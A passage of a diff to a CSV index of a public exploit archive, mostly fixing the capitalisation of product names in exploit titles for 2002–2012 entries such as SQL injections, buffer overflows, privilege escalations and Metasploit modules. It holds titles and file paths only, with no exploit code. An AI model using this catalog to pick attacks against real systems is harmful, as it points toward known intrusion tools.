Overflow",2002-07-24,doe,windows,remote,0 21644,platforms/unix/dos/21644.txt,"Pine 4.x - Empty MIME Boundary Denial of Service",2002-07-24,"Martin J. Muench",unix,dos,0 21645,platforms/windows/dos/21645.txt,"Foxit Reader 5.4.3.0920 - Crash (PoC)",2012-10-01,coolkaveh,windows,dos,0 -21646,platforms/php/webapps/21646.py,"Archin Wordpress Theme 3.2 - Unauthenticated Configuration Access",2012-10-01,bwall,php,webapps,0 +21646,platforms/php/webapps/21646.py,"Archin WordPress Theme 3.2 - Unauthenticated Configuration Access",2012-10-01,bwall,php,webapps,0 21648,platforms/windows/remote/21648.txt,"Pegasus Mail 4.0 1 - Message Header Buffer Overflow",2002-07-24,"Auriemma Luigi",windows,remote,0 -21649,platforms/multiple/remote/21649.txt,"CacheFlow CacheOS 3.1.x/4.0.x/4.1 - Unresolved Domain Cross-Site Scripting",2002-07-24,T.Suzuki,multiple,remote,0 +21649,platforms/multiple/remote/21649.txt,"Cacheflow CacheOS 3.1.x/4.0.x/4.1 - Unresolved Domain Cross-Site Scripting",2002-07-24,T.Suzuki,multiple,remote,0 21651,platforms/windows/remote/21651.txt,"Microsoft SQL Server 2000 - sp_MScopyscript SQL Injection",2002-07-25,"Cesar Cerrudo",windows,remote,0 21652,platforms/windows/remote/21652.cpp,"Microsoft SQL Server 2000 - Resolution Service Heap Overflow",2002-07-25,"David Litchfield",windows,remote,0 21653,platforms/windows/dos/21653.c,"KaZaA Media Desktop 1.7.1 - Large Message Denial of Service",2002-07-25,"Josh and omega",windows,dos,0 @@ -18934,7 +18935,7 @@ id,file,description,date,author,platform,type,port 21656,platforms/hardware/dos/21656.txt,"Lucent Access Point 300/600/1500 IP Services Router - Long HTTP Request Denial of Service",2002-07-27,FX,hardware,dos,0 21657,platforms/hardware/dos/21657.txt,"HP ProCurve Switch 4000M - SNMP Write Denial of Service",2002-07-27,FX,hardware,dos,0 21658,platforms/cgi/webapps/21658.html,"Ben Chivers Easy Homepage Creator 1.0 - File Modification",2002-07-29,"Arek Suroboyo",cgi,webapps,0 -21659,platforms/cgi/webapps/21659.html,"Ben Chivers Easy GuestBook 1.0 - Administrative Access",2002-07-29,"Arek Suroboyo",cgi,webapps,0 +21659,platforms/cgi/webapps/21659.html,"Ben Chivers Easy Guestbook 1.0 - Administrative Access",2002-07-29,"Arek Suroboyo",cgi,webapps,0 21660,platforms/php/webapps/21660.txt,"phpBB2 Gender Mod 1.1.3 - SQL Injection",2002-07-29,"langtuhaohoa caothuvolam",php,webapps,0 21661,platforms/php/webapps/21661.txt,"dotProject 0.2.1 - User Cookie Authentication Bypass",2002-07-29,pokleyzz,php,webapps,0 21662,platforms/windows/remote/21662.txt,"Microsoft Outlook Express 6 - XML File Attachment Script Execution",2002-07-29,http-equiv,windows,remote,0 @@ -18954,7 +18955,7 @@ id,file,description,date,author,platform,type,port 21677,platforms/solaris/remote/21677.txt,"Sun AnswerBook2 1.x - Unauthorized Administrative Script Access",2002-08-02,ghandi,solaris,remote,0 21678,platforms/solaris/remote/21678.c,"Inso DynaWeb httpd 3.1/4.0.2/4.1 - Format String",2002-08-02,ghandi,solaris,remote,0 21679,platforms/cgi/webapps/21679.txt,"Dispair 0.1/0.2 - Remote Command Execution",2002-07-30,anonymous,cgi,webapps,0 -21680,platforms/windows/remote/21680.pl,"Qualcomm Eudora 5 - MIME Multipart Boundary Buffer Overflow",2002-08-05,Kanatoko,windows,remote,0 +21680,platforms/windows/remote/21680.pl,"Qualcomm Eudora 5 - MIME MultiPart Boundary Buffer Overflow",2002-08-05,Kanatoko,windows,remote,0 21681,platforms/windows/remote/21681.html,"Opera 6.0.x - FTP View Cross-Site Scripting",2002-08-06,"Eiji James Yoshida",windows,remote,0 21682,platforms/unix/remote/21682.txt,"Mozilla 1.0/1.1 - FTP View Cross-Site Scripting",2002-08-06,"Eiji James Yoshida",unix,remote,0 21683,platforms/linux/local/21683.c,"qmailadmin 1.0.x - Local Buffer Overflow",2002-08-06,"Thomas Cannon",linux,local,0 @@ -18968,7 +18969,7 @@ id,file,description,date,author,platform,type,port 21691,platforms/windows/local/21691.txt,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error (8)",2002-08-06,anonymous,windows,local,0 21692,platforms/windows/remote/21692.txt,"Microsoft Internet Explorer 5/6 / Konqueror 2.2.2/3.0 / Weblogic Server 5/6/7 - Invalid X.509 Certificate Chain",2002-08-06,"Mike Benham",windows,remote,0 21693,platforms/windows/remote/21693.nasl,"Microsoft SQL Server 2000 - User Authentication Remote Buffer Overflow",2002-08-06,"Dave Aitel",windows,remote,0 -21694,platforms/windows/dos/21694.pl,"602Pro LAN SUITE 2002 - Telnet Proxy Localhost Denial of Service",2002-08-03,"Stan Bubrouski",windows,dos,0 +21694,platforms/windows/dos/21694.pl,"602Pro LAN SUITE 2002 - Telnet Proxy localhost Denial of Service",2002-08-03,"Stan Bubrouski",windows,dos,0 21695,platforms/windows/remote/21695.pl,"Qualcomm Eudora 5/6 - File Attachment Spoofing (1)",2002-08-08,"Paul Szabo",windows,remote,0 21696,platforms/windows/remote/21696.pl,"Qualcomm Eudora 5/6 - File Attachment Spoofing (2)",2002-08-08,"Paul Szabo",windows,remote,0 21697,platforms/windows/remote/21697.txt,"Apache 2.0 - Encoded Backslash Directory Traversal",2002-08-09,"Auriemma Luigi",windows,remote,0 @@ -18979,7 +18980,7 @@ id,file,description,date,author,platform,type,port 21702,platforms/asp/webapps/21702.txt,"Midicart ASP - Remote Customer Information Retrieval",2002-08-10,"Dimitri Sekhniashvili",asp,webapps,0 21703,platforms/windows/dos/21703.txt,"Citrix Metaframe for Windows NT 4.0 TSE 1.8 - Java ICA Environment Denial of Service",2002-08-11,"Tanin Ehrami",windows,dos,0 21704,platforms/unix/remote/21704.txt,"W3C CERN httpd 3.0 Proxy - Cross-Site Scripting",2002-08-12,"TAKAGI Hiromitsu",unix,remote,0 -21705,platforms/windows/remote/21705.txt,"Microsoft Internet Explorer 6.0 - File Attachment Script Execution",2002-08-13,http-equiv,windows,remote,0 +21705,platforms/windows/remote/21705.txt,"Microsoft Internet Explorer 6 - File Attachment Script Execution",2002-08-13,http-equiv,windows,remote,0 21706,platforms/linux/remote/21706.txt,"Red Hat Interchange 4.8.x - Arbitrary File Read",2002-08-13,anonymous,linux,remote,0 21707,platforms/windows/remote/21707.txt,"GoAhead WebServer 2.1 - Arbitrary Command Execution",2002-08-14,anonymous,windows,remote,0 21708,platforms/php/webapps/21708.txt,"Leszek Krupinski L-Forum 2.4 - Search Script SQL Injection",2002-08-14,"Matthew Murphy",php,webapps,0 @@ -18988,7 +18989,7 @@ id,file,description,date,author,platform,type,port 21711,platforms/windows/remote/21711.html,"Microsoft Outlook Express 5/6 - MHTML URL Handler File Rendering",2002-08-15,http-equiv,windows,remote,0 21712,platforms/windows/dos/21712.txt,"Google Toolbar 1.1.60 - Search Function Denial of Service",2002-08-15,onet,windows,dos,0 21713,platforms/windows/local/21713.py,"NCMedia Sound Editor Pro 7.5.1 - (SEH + DEP Bypass)",2012-10-03,b33f,windows,local,0 -21715,platforms/php/webapps/21715.txt,"Wordpress Plugin spider Calendar - Multiple Vulnerabilities",2012-10-03,D4NB4R,php,webapps,0 +21715,platforms/php/webapps/21715.txt,"WordPress Plugin spider Calendar - Multiple Vulnerabilities",2012-10-03,D4NB4R,php,webapps,0 21716,platforms/php/webapps/21716.txt,"Omnistar Mailer 7.2 - Multiple Vulnerabilities",2012-10-03,Vulnerability-Lab,php,webapps,0 21717,platforms/windows/remote/21717.txt,"Microsoft Windows XP - HCP URI Handler Abuse",2002-08-15,"Shane Hird",windows,remote,0 21718,platforms/windows/remote/21718.txt,"Microsoft SQL 2000/7.0 - Agent Jobs Privilege Elevation",2002-08-15,"David Litchfield",windows,remote,0 @@ -19011,7 +19012,7 @@ id,file,description,date,author,platform,type,port 21735,platforms/windows/remote/21735.txt,"Abyss Web Server 1.0 - Encoded Backslash Directory Traversal",2002-08-22,"Auriemma Luigi",windows,remote,0 21736,platforms/hardware/dos/21736.txt,"LG LR3100p 1.30 Series Router - IP Packet Flags Denial of Service",2002-08-22,"Lukasz Bromirski",hardware,dos,0 21737,platforms/windows/dos/21737.txt,"Cyme ChartFX Client Server - ActiveX Control Array Indexing",2012-10-04,"Francis Provencher",windows,dos,0 -21834,platforms/php/webapps/21834.rb,"PHPMyAdmin 3.5.2.2 - server_sync.php Backdoor",2012-10-10,Metasploit,php,webapps,0 +21834,platforms/php/webapps/21834.rb,"phpMyAdmin 3.5.2.2 - server_sync.php Backdoor",2012-10-10,Metasploit,php,webapps,0 21739,platforms/windows/dos/21739.pl,"JPEGsnoop 1.5.2 - WriteAV Crash (PoC)",2012-10-04,"Jean Pascal Pereira",windows,dos,0 21740,platforms/php/webapps/21740.txt,"phpmychat plus 1.94 rc1 - Multiple Vulnerabilities",2012-10-04,L0n3ly-H34rT,php,webapps,0 21741,platforms/windows/dos/21741.txt,"XnView 1.99.1 - '.JLS' File Decompression Heap Overflow",2012-10-04,"Joseph Sheridan",windows,dos,0 @@ -19030,7 +19031,7 @@ id,file,description,date,author,platform,type,port 21754,platforms/windows/remote/21754.txt,"OmniHTTPd 1.1/2.0.x/2.4 - test.shtml Sample Application Cross-Site Scripting",2002-08-26,"Matthew Murphy",windows,remote,0 21755,platforms/php/webapps/21755.txt,"PHPReactor 1.2.7 - Style Attribute HTML Injection",2002-08-24,"Matthew Murphy",php,webapps,0 21756,platforms/hardware/dos/21756.txt,"Belkin F5D6130 Wireless Network Access Point - SNMP Request Denial of Service",2002-08-26,wlanman,hardware,dos,0 -21757,platforms/windows/remote/21757.txt,"OmniHTTPD 1.1/2.0.x/2.4 - Sample Application URL Encoded Newline HTML Injection",2002-08-26,"Matthew Murphy",windows,remote,0 +21757,platforms/windows/remote/21757.txt,"OmniHTTPd 1.1/2.0.x/2.4 - Sample Application URL Encoded Newline HTML Injection",2002-08-26,"Matthew Murphy",windows,remote,0 21758,platforms/unix/local/21758.txt,"Caldera X Server 7.1/8.0 - External Program Privileged Invocation",2002-08-27,"Olaf Kirch",unix,local,0 21759,platforms/windows/remote/21759.txt,"mIRC 6.0 - Scripting ASCTime Buffer Overflow",2002-08-27,"James Martin",windows,remote,0 21760,platforms/unix/local/21760.c,"GDAM123 0.933/0.942 - Filename Buffer Overflow",2002-08-24,"Netric Security",unix,local,0 @@ -19058,13 +19059,13 @@ id,file,description,date,author,platform,type,port 21782,platforms/multiple/dos/21782.txt,"Oracle 8.1.x/9.0/9.2 - TNS Listener Service_CurLoad Remote Denial of Service",2002-09-09,"Rapid 7",multiple,dos,0 21783,platforms/php/webapps/21783.txt,"PHPGB 1.1/1.2 - PHP Code Injection",2002-09-09,ppp-design,php,webapps,0 21784,platforms/linux/remote/21784.c,"Netris 0.3/0.4/0.5 - Remote Memory Corruption",2002-09-09,V9,linux,remote,0 -21786,platforms/php/webapps/21786.php,"Blog Mod 0.1.9 - (index.php month parameter) SQL Injection",2012-10-07,WhiteCollarGroup,php,webapps,0 +21786,platforms/php/webapps/21786.php,"Blog Mod 0.1.9 - (index.php month Parameter) SQL Injection",2012-10-07,WhiteCollarGroup,php,webapps,0 21789,platforms/windows/dos/21789.txt,"Alleged Outlook Express 5/6 Link - Denial of Service",2002-09-09,"Stefano Zanero",windows,dos,0 -21790,platforms/unix/local/21790.sh,"Cobalt Linux 6.0 - RaQ authenticate Privilege Escalation",2002-06-28,"Charles Stevenson",unix,local,0 +21790,platforms/unix/local/21790.sh,"Cobalt Linux 6.0 - RaQ Authenticate Privilege Escalation",2002-06-28,"Charles Stevenson",unix,local,0 21791,platforms/hardware/dos/21791.txt,"Enterasys SSR8000 SmartSwitch - Port Scan Denial of Service",2002-09-13,"Mella Marco",hardware,dos,0 -21792,platforms/windows/dos/21792.txt,"Savant Webserver 3.1 - Malformed Content-Length Denial of Service",2002-09-13,"Auriemma Luigi",windows,dos,0 +21792,platforms/windows/dos/21792.txt,"Savant WebServer 3.1 - Malformed Content-Length Denial of Service",2002-09-13,"Auriemma Luigi",windows,dos,0 21793,platforms/linux/local/21793.txt,"BRU 17.0 - XBRU Insecure Temporary File",2002-09-13,prophecy,linux,local,0 -21794,platforms/windows/remote/21794.txt,"Savant Webserver 3.1 - File Disclosure",2002-09-13,"Auriemma Luigi",windows,remote,0 +21794,platforms/windows/remote/21794.txt,"Savant WebServer 3.1 - File Disclosure",2002-09-13,"Auriemma Luigi",windows,remote,0 21795,platforms/windows/dos/21795.pl,"PlanetWeb 1.14 - Long GET Request Buffer Overflow",2002-09-16,UkR-XblP,windows,dos,0 21796,platforms/unix/local/21796.txt,"BubbleMon 1.x Kernel - Memory File Descriptor Leakage",2002-09-16,badc0ded,unix,local,0 21797,platforms/unix/local/21797.txt,"ASCPU 0.60 Kernel - Memory File Descriptor Leakage",2002-09-16,badc0ded,unix,local,0 @@ -19084,8 +19085,8 @@ id,file,description,date,author,platform,type,port 21811,platforms/php/webapps/21811.txt,"SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities",2002-09-19,"DarC KonQuest",php,webapps,0 21812,platforms/windows/remote/21812.txt,"Microsoft Word 95/97/98/2000/2002 - INCLUDEPICTURE Document Sharing File Disclosure",2002-09-20,"Richard Edwards",windows,remote,0 21813,platforms/windows/dos/21813.c,"Trillian 0.73/0.74 - IRC JOIN Buffer Overflow",2002-09-20,"Lance Fitz-Herbert",windows,dos,0 -21814,platforms/linux/local/21814.c,"Alsaplayer 0.99.71 - Local Buffer Overflow",2002-09-20,zillion,linux,local,0 -21815,platforms/osx/local/21815.txt,"Apple Mac OSX 10.2 - Terminal.APP Telnet Link Command Execution",2002-09-21,"Taiyo Fujii",osx,local,0 +21814,platforms/linux/local/21814.c,"AlsaPlayer 0.99.71 - Local Buffer Overflow",2002-09-20,zillion,linux,local,0 +21815,platforms/osx/local/21815.txt,"Apple Mac OS X 10.2 - Terminal.APP Telnet Link Command Execution",2002-09-21,"Taiyo Fujii",osx,local,0 21816,platforms/windows/dos/21816.c,"Trillian 0.725/0.73/0.74 - IRC User Mode Numeric Remote Buffer Overflow",2002-09-21,"Lance Fitz-Herbert",windows,dos,0 21817,platforms/php/webapps/21817.txt,"Rudi Benkovic JAWMail 1.0 - Script Injection",2002-09-23,"Ulf Harnhammar",php,webapps,0 21818,platforms/linux/remote/21818.c,"Null HTTPd 0.5 - Remote Heap Overflow",2002-09-23,eSDee,linux,remote,0 @@ -19105,7 +19106,7 @@ id,file,description,date,author,platform,type,port 21827,platforms/hardware/remote/21827.txt,"HP Compaq Insight Manager - Web Interface Cross-Site Scripting",2002-09-23,"Taylor Huff",hardware,remote,0 21828,platforms/hardware/dos/21828.txt,"HP Procurve 4000M Switch - Device Reset Denial of Service",2002-09-24,"Brook Powers",hardware,dos,0 21829,platforms/php/webapps/21829.txt,"XOOPS 1.0 RC3 - HTML Injection",2002-09-24,das@hush.com,php,webapps,0 -21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 - (Unicode) NULL Pointer Dereference",2012-10-09,wh1ant,windows,dos,0 +21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 - 'UNICODE' NULL Pointer Dereference",2012-10-09,wh1ant,windows,dos,0 21831,platforms/windows/local/21831.c,"PLIB 1.8.5 - ssg/ssgParser.cxx Buffer Overflow",2012-10-09,"Andrés Gómez",windows,local,0 21835,platforms/php/webapps/21835.rb,"qdPM 7.0 - Arbitrary PHP File Upload",2012-10-10,Metasploit,php,webapps,0 21836,platforms/linux/webapps/21836.rb,"Auxilium RateMyPet - Arbitrary File Upload",2012-10-10,Metasploit,linux,webapps,0 @@ -19115,9 +19116,9 @@ id,file,description,date,author,platform,type,port 21840,platforms/windows/remote/21840.rb,"Microsoft Internet Explorer - execCommand Use-After-Free (MS12-063)",2012-10-10,Metasploit,windows,remote,0 21841,platforms/windows/remote/21841.rb,"NTR - ActiveX Control Check() Method Buffer Overflow",2012-10-10,Metasploit,windows,remote,0 21842,platforms/windows/remote/21842.rb,"HP Application Lifecycle Management - XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution",2012-10-10,Metasploit,windows,remote,0 -21843,platforms/windows/local/21843.rb,"Windows - Escalate UAC Execute RunAs",2012-10-10,Metasploit,windows,local,0 -21844,platforms/windows/local/21844.rb,"Microsoft Windows - AfdJoinLeaf Privilege Escalation (MS11-080)",2012-10-10,Metasploit,windows,local,0 -21845,platforms/windows/local/21845.rb,"Windows - Escalate UAC Protection Bypass",2012-10-10,Metasploit,windows,local,0 +21843,platforms/windows/local/21843.rb,"Microsoft Windows - Escalate UAC Execute RunAs",2012-10-10,Metasploit,windows,local,0 +21844,platforms/windows/local/21844.rb,"Microsoft Windows - 'AfdJoinLeaf' Privilege Escalation (MS11-080)",2012-10-10,Metasploit,windows,local,0 +21845,platforms/windows/local/21845.rb,"Microsoft Windows - Escalate UAC Protection Bypass",2012-10-10,Metasploit,windows,local,0 21846,platforms/java/remote/21846.rb,"Oracle Business Transaction Management FlashTunnelService - Remote Code Execution",2012-10-10,Metasploit,java,remote,7001 21847,platforms/windows/remote/21847.rb,"Avaya IP Office Customer Call Reporter - ImageUpload.ashx Remote Command Execution",2012-10-10,Metasploit,windows,remote,0 21848,platforms/linux/local/21848.rb,"Linux udev - Netlink Privilege Escalation",2012-10-10,Metasploit,linux,local,0 @@ -19140,8 +19141,8 @@ id,file,description,date,author,platform,type,port 21865,platforms/linux/local/21865.c,"Interbase 5/6 - GDS_Lock_MGR UMask File Permission Changing",2002-09-25,grazer,linux,local,0 21866,platforms/multiple/webapps/21866.txt,"ServersCheck Monitoring Software 9.0.12 / 9.0.14 - Persistent Cross-Site Scripting",2012-10-10,loneferret,multiple,webapps,0 21891,platforms/php/webapps/21891.txt,"vOlk Botnet Framework 4.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps,0 -21868,platforms/ios/remote/21868.rb,"Apple iOS MobileSafari - LibTIFF Buffer Overflow",2012-10-09,Metasploit,ios,remote,0 -21869,platforms/ios/remote/21869.rb,"Apple iOS MobileMail - LibTIFF Buffer Overflow",2012-10-09,Metasploit,ios,remote,0 +21868,platforms/ios/remote/21868.rb,"Apple iOS Mobile Safari - LibTIFF Buffer Overflow",2012-10-09,Metasploit,ios,remote,0 +21869,platforms/ios/remote/21869.rb,"Apple iOS Mobile Mail - LibTIFF Buffer Overflow",2012-10-09,Metasploit,ios,remote,0 21870,platforms/linux/remote/21870.txt,"Zope 2.x - Incorrect XML-RPC Request Information Disclosure",2002-09-26,"Rossen Raykov",linux,remote,0 21871,platforms/linux/local/21871.c,"GV 2.x/3.x - Malformed PDF/PS File Buffer Overflow (1)",2002-09-26,zen-parse,linux,local,0 21872,platforms/linux/local/21872.c,"GV 2.x/3.x - Malformed PDF/PS File Buffer Overflow (2)",2002-09-26,infamous42md,linux,local,0 @@ -19155,7 +19156,7 @@ id,file,description,date,author,platform,type,port 21880,platforms/multiple/remote/21880.txt,"Monkey HTTP Server 0.1/0.4/0.5 - Multiple Cross-Site Scripting Vulnerabilities",2002-09-30,DownBload,multiple,remote,0 21887,platforms/windows/local/21887.php,"PHP 5.3.4 Win Com Module - Com_sink Exploit",2012-10-11,fb1h2s,windows,local,0 21888,platforms/windows/remote/21888.rb,"KeyHelp - ActiveX LaunchTriPane Remote Code Execution",2012-10-11,Metasploit,windows,remote,0 -21889,platforms/windows/dos/21889.pl,"VLC Player 2.0.3 - (.png) ReadAV Crash (PoC)",2012-10-11,"Jean Pascal Pereira",windows,dos,0 +21889,platforms/windows/dos/21889.pl,"VLC Player 2.0.3 - '.png' ReadAV Crash (PoC)",2012-10-11,"Jean Pascal Pereira",windows,dos,0 21890,platforms/php/webapps/21890.txt,"Omnistar Document Manager 8.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps,0 21892,platforms/windows/local/21892.txt,"FileBound 6.2 - Privilege Escalation",2012-10-11,"Nathaniel Carew",windows,local,0 21893,platforms/php/webapps/21893.php,"TightAuction 3.0 - Config.INC Information Disclosure",2002-10-02,frog,php,webapps,0 @@ -19170,7 +19171,7 @@ id,file,description,date,author,platform,type,port 21902,platforms/windows/remote/21902.c,"Microsoft Windows 2000/XP/NT 4 - Help Facility ActiveX Control Buffer Overflow",2002-10-07,ipxodi,windows,remote,0 21903,platforms/php/webapps/21903.txt,"Michael Schatz Books 0.54/0.6 PostNuke Module - Cross-Site Scripting",2002-10-03,Pistone,php,webapps,0 21904,platforms/aix/local/21904.pl,"IBM AIX 4.3.x/5.1 - ERRPT Local Buffer Overflow",2003-04-16,watercloud,aix,local,0 -21905,platforms/php/webapps/21905.txt,"phpMyNewsLetter 0.6.10 - Remote File Inclusion",2002-10-03,frog,php,webapps,0 +21905,platforms/php/webapps/21905.txt,"phpMyNewsletter 0.6.10 - Remote File Inclusion",2002-10-03,frog,php,webapps,0 21906,platforms/php/webapps/21906.txt,"phpLinkat 0.1 - Multiple Cross-Site Scripting Vulnerabilities",2002-10-04,Sp.IC,php,webapps,0 21907,platforms/windows/dos/21907.c,"Cooolsoft PowerFTP Server 2.x - Remote Denial of Service (1)",2002-10-05,Morgan,windows,dos,0 21908,platforms/windows/dos/21908.pl,"Cooolsoft PowerFTP Server 2.x - Remote Denial of Service (2)",2002-10-05,subj,windows,dos,0 @@ -19201,7 +19202,7 @@ id,file,description,date,author,platform,type,port 21935,platforms/windows/dos/21935.txt,"My Web Server 1.0.1/1.0.2 - Long Get Request Denial of Service",2002-10-12,"Marc Ruef",windows,dos,0 21936,platforms/linux/remote/21936.c,"ATP httpd 0.4 - Single Byte Buffer Overflow",2002-10-05,thread,linux,remote,0 21937,platforms/linux/remote/21937.c,"ghttpd 1.4.x - Log() Function Buffer Overflow",2002-10-07,flea,linux,remote,0 -21938,platforms/windows/dos/21938.txt,"TelCondex SimpleWebServer 2.0.6 - Denial of Service",2002-10-15,"Marc Ruef",windows,dos,0 +21938,platforms/windows/dos/21938.txt,"TelCondex SimpleWebserver 2.0.6 - Denial of Service",2002-10-15,"Marc Ruef",windows,dos,0 21939,platforms/hardware/dos/21939.txt,"Polycom ViaVideo 2.2/3.0 - Denial of Service",2002-10-15,prophecy.net.nz,hardware,dos,0 21940,platforms/windows/remote/21940.txt,"Microsoft Internet Explorer 5/6 - Unauthorized Document Object Model Access",2002-10-15,"GreyMagic Software",windows,remote,0 21941,platforms/windows/dos/21941.txt,"Polycom 2.2/3.0 - ViaVideo Buffer Overflow",2002-10-15,prophecy.net.nz,windows,dos,0 @@ -19227,7 +19228,7 @@ id,file,description,date,author,platform,type,port 21961,platforms/php/webapps/21961.txt,"MyMarket 1.71 - Form_Header.php Cross-Site Scripting",2002-10-23,qber66,php,webapps,0 21962,platforms/cgi/webapps/21962.txt,"Mojo Mail 2.7 - Email Form Cross-Site Scripting",2002-10-24,"Daniel Boland",cgi,webapps,0 21963,platforms/windows/dos/21963.pl,"SolarWinds TFTP Server Standard Edition 5.0.55 - Large UDP Packet",2002-10-24,D4rkGr3y,windows,dos,0 -21964,platforms/windows/remote/21964.txt,"Solarwinds TFTP Server Standard Edition 5.0.55 - Directory Traversal",2002-10-25,"Matthew Murphy",windows,remote,0 +21964,platforms/windows/remote/21964.txt,"SolarWinds TFTP Server Standard Edition 5.0.55 - Directory Traversal",2002-10-25,"Matthew Murphy",windows,remote,0 21965,platforms/windows/dos/21965.txt,"Alt-N MDaemon 6.0.x - POP Server Buffer Overflow",2002-10-28,D4rkGr3y,windows,dos,0 21966,platforms/cgi/webapps/21966.txt,"MailReader.com 2.3.x - NPH-MR.cgi File Disclosure",2002-10-28,pokleyzz,cgi,webapps,0 21967,platforms/php/webapps/21967.txt,"Benjamin Lefevre Dobermann Forum 0.x - entete.php subpath Parameter Remote File Inclusion",2002-10-28,frog,php,webapps,0 @@ -19249,26 +19250,26 @@ id,file,description,date,author,platform,type,port 21983,platforms/hardware/remote/21983.c,"GlobalSunTech Access Point GL2422AP-0T - Information Disclosure",2002-11-04,"Tom Knienieder",hardware,remote,0 21984,platforms/unix/dos/21984.c,"QNX 6.1 - TimeCreate Local Denial of Service",2002-11-06,"Pawel Pisarczyk",unix,dos,0 21985,platforms/linux/dos/21985.txt,"Pine 4.x - From: Field Heap Corruption",2002-11-07,lsjoberg,linux,dos,0 -21986,platforms/windows/dos/21986.pl,"Windows Media Player 10 - '.avi' Integer Division By Zero Crash (PoC)",2012-10-15,Dark-Puzzle,windows,dos,0 +21986,platforms/windows/dos/21986.pl,"Microsoft Windows Media Player 10 - '.avi' Integer Division By Zero Crash (PoC)",2012-10-15,Dark-Puzzle,windows,dos,0 21988,platforms/windows/local/21988.pl,"Huawei Technologies Internet Mobile - Unicode SEH Exploit",2012-10-15,Dark-Puzzle,windows,local,0 21989,platforms/php/webapps/21989.txt,"Cartweaver 3 - Local File Inclusion",2012-10-15,HaxOr,php,webapps,0 21990,platforms/php/webapps/21990.txt,"airVisionNVR 1.1.13 - readfile() Disclosure / SQL Injection",2012-10-15,pennyGrit,php,webapps,0 21991,platforms/windows/dos/21991.py,"QQPlayer 3.7.892 - m2p quartz.dll Heap Pointer Overwrite (PoC)",2012-10-15,"James Ritchey",windows,dos,0 21992,platforms/hardware/webapps/21992.txt,"BigPond 3G21WB - Multiple Vulnerabilities",2012-10-15,"Roberto Paleari",hardware,webapps,0 21993,platforms/php/remote/21993.rb,"AjaXplorer - checkInstall.php Remote Command Execution",2012-10-16,Metasploit,php,remote,0 -21994,platforms/windows/local/21994.rb,"Windows - Escalate Service Permissions Privilege Escalation",2012-10-16,Metasploit,windows,local,0 +21994,platforms/windows/local/21994.rb,"Microsoft Windows - Escalate Service Permissions Privilege Escalation",2012-10-16,Metasploit,windows,local,0 21995,platforms/cgi/webapps/21995.txt,"CuteCast 1.2 - User Credential Disclosure",2002-11-07,Zero-X,cgi,webapps,0 -21996,platforms/multiple/remote/21996.txt,"Lotus Domino 5.0.8-9 - Non-existent NSF Database Banner Information Disclosure",2002-11-07,"Frank Perreault",multiple,remote,0 +21996,platforms/multiple/remote/21996.txt,"Lotus Domino 5.0.8-9 - Non-Existent NSF Database Banner Information Disclosure",2002-11-07,"Frank Perreault",multiple,remote,0 21997,platforms/windows/remote/21997.txt,"Perception LiteServe 2.0.1 - DNS Wildcard Cross-Site Scripting",2002-11-08,"Matthew Murphy",windows,remote,0 21998,platforms/linux/remote/21998.c,"CGIEmail 1.6 - Remote Buffer Overflow",2001-09-11,isox,linux,remote,0 21999,platforms/windows/remote/21999.txt,"Perception LiteServe 2.0.1 - Directory Query String Cross-Site Scripting",2002-11-08,"Matthew Murphy",windows,remote,0 22000,platforms/cgi/remote/22000.txt,"Zeus Web Server 4.0/4.1 - Admin Interface Cross-Site Scripting",2002-11-08,euronymous,cgi,remote,0 22001,platforms/windows/remote/22001.txt,"Simple Web Server 0.5.1 - File Disclosure",2002-11-08,"Tamer Sahin",windows,remote,0 22002,platforms/linux/local/22002.txt,"QNX RTOS 6.2 - Application Packager Non-Explicit Path Execution",2002-11-08,Texonet,linux,local,0 -22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 - (albums.php album parameter) SQL Injection",2012-10-16,Zixem,php,webapps,0 -22004,platforms/php/webapps/22004.txt,"Joomla iCagenda Component - (id parameter) Multiple Vulnerabilities",2012-10-16,Dark-Puzzle,php,webapps,0 +22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 - (albums.php album Parameter) SQL Injection",2012-10-16,Zixem,php,webapps,0 +22004,platforms/php/webapps/22004.txt,"Joomla iCagenda Component - (id Parameter) Multiple Vulnerabilities",2012-10-16,Dark-Puzzle,php,webapps,0 22005,platforms/hardware/webapps/22005.txt,"visual tools dvr 3.0.6.16_ vx series 4.2.19.2 - Multiple Vulnerabilities",2012-10-16,"Andrea Fabrizi",hardware,webapps,0 -22006,platforms/windows/dos/22006.txt,"Ezhometech EzServer 7.0 - Remote Heap Corruption",2012-10-16,"Lorenzo Cantoni",windows,dos,0 +22006,platforms/windows/dos/22006.txt,"EZHomeTech EzServer 7.0 - Remote Heap Corruption",2012-10-16,"Lorenzo Cantoni",windows,dos,0 22007,platforms/windows/remote/22007.txt,"Samsung Kies 2.3.2.12054_20 - Multiple Vulnerabilities",2012-10-16,"High-Tech Bridge SA",windows,remote,0 22009,platforms/php/webapps/22009.txt,"EZ Systems HTTPBench 1.1 - Information Disclosure",2002-11-11,"Tacettin Karadeniz",php,webapps,0 22010,platforms/multiple/dos/22010.txt,"Hotfoon Dialer 4.0 - Buffer Overflow",2002-11-11,"S G Masood",multiple,dos,0 @@ -19332,12 +19333,12 @@ id,file,description,date,author,platform,type,port 22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x Mod_JK - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0 22069,platforms/multiple/local/22069.py,"Oracle Database - Authentication Protocol Security Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0 22070,platforms/windows/webapps/22070.py,"otrs 3.1 - Persistent Cross-Site Scripting",2012-10-18,"Mike Eduard",windows,webapps,0 -22071,platforms/php/webapps/22071.txt,"FireStorm Professional Real Estate Wordpress Plugin 2.06.01 - SQL Injection",2012-10-18,"Ashiyane Digital Security Team",php,webapps,0 -22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0 +22071,platforms/php/webapps/22071.txt,"FireStorm Professional Real Estate WordPress Plugin 2.06.01 - SQL Injection",2012-10-18,"Ashiyane Digital Security Team",php,webapps,0 +22074,platforms/osx/dos/22074.txt,"Apple Mac OS X 10.2.2 